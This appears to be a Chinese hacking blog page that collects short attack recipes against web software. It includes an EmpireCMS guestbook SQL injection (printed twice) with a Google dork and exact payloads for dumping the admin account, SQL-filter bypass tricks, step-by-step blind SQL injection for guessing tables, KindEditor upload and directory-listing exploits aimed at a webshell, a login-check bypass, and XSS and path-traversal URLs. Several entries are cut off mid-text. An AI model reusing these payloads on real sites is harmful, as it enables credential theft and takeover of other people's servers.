找到使用帝国CMS的站,就是在Google里输入powered by empirecms查找,找到后网址后面直接加:e/tool/gbook/?bid=1
出来的是帝国CMS的留言本,在姓名处写:縗\
联系邮箱处写:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from
phome_enewsuser where userid=1),1,1,1,0,0,0)/*
提交后爆出账号密码
找到使用帝国CMS的站,就是在Google里输入powered by empirecms查找,找到后网址后面直接加:e/tool/gbook/?bid=1
出来的是帝国CMS的留言本,在姓名处写:縗\
联系邮箱处写:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from
phome_enewsuser where userid=1),1,1,1,0,0,0)/*
提交后爆出账号密码
大约14年前发现一直到现在的0day
是IIS4\IIS5的漏洞,对应操作系统是winnt和win2000系统,微软不再支持这些软件,他们的策略想淘汰这些系统,11年报告后微软决定不再修补。算是很严重的漏洞,只是影响的软件现在使用率相对比较低,但总量也不少。
具体漏洞详细信息如下:
IIS加载CGI环境块伪造漏洞 危害等级:高危 危害类型:缓冲区溢出、远程执行代码、信息泄露 影响平台:Winnt\win2000 影响软件:IIS4、IIS5基本情况:
IIS4、IIS5加载CGI,处理环境块的时候,错误的把“\n”字符用“\x00”替换,导致可...
链接: http://pan.baidu.com/s/1jGxBNJg 密码: 33rp
商品搜索可以构建SQL语句!
http://www.yungoucms.cn/?/s_tag/
publicfunction tag(){
$search =$this->segment(4);
if(!$search)_message("输入搜索关键字");
$search = urldecode($search);
$search = htmlspecialchars($search);...
在Web程序中普通用户一般只在Web界面里完成他想要的操作,Web程序接受的正常客户端请求一般来自用户的点击链接和表单提交等行为,可是恶意攻击者却可以依靠脚本和浏览器的安全缺陷来劫持客户端会话、伪造客户端请求。
CSRF是伪造客户端请求的一种攻击,CSRF的英文全称是Cross Site Request Forgery,字面上的意思是跨站点伪造请求。这种攻击方式是国外的安全人员于2000年提出,国内直到06年初才被关注,早期我们团队的剑心使用过 CSRF攻击实现了DVBBS后台的SQL注射,同时网上也出现过动易后台管理员添加的CSRF漏洞等,08年CSRF攻击方式开始在BLOG、SNS等 ...
1、运用编码技术绕过
如URLEncode编码,ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。
2、通过空格绕过
如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如
or swords =‘swords,由于mssql的松散性,我们可以把or swords 之间的空格去掉,并不影响运行。
3、运用字符串判断代替
用经典的or 1=1判断绕过,如or swords =swords,这个方法就是网上在讨论的。
4、通过类型转换修饰符N绕过
可以说这是一个不错的想法...
KindEditor上传解析漏洞
影响版本:<= kindeditor 3.2.1(09年8月份发布的最新版)
漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL
KindEditor列目录漏洞
测试版本:KindEditor 3.4.2 KindEditor 3.5.5
1.http://mysec.pw/kindeditor/php/file_manager_json.php?path=/
//path=/,爆出绝对路径D:AppServwww67cmskind...
假如后台地址是:http://www.hdminc.net/admin/admin_index.asp
当用万能密码登录的时候,会出现一些过滤or的提示!
请右键查看源文件,另存为桌面 XX.html,然后打开找到以下这段代码,进行删除!
<script language=”javascript”> function chencklogin() { if(document.login.username.value==”) {alert(‘请输入用户名’); document.login.username.focus(); return false...
1.判断有无注入点
; and 1=1 and 1=2
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) —判断是否存在admin这张表
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*)...
Google Dork: intext:"Powered by Proactive CMS"
XSS http:// www.myhacker.me /index.php?action=search&q=1</title>1<script >alert(document.cookie)</script>
目录遍历: http:// www.myhacker.me /lavate/cute.old/Dialogs/Tag.Frame.php?setting=&Style=../../../../.....
© Hacker by X | Powered by LOFTER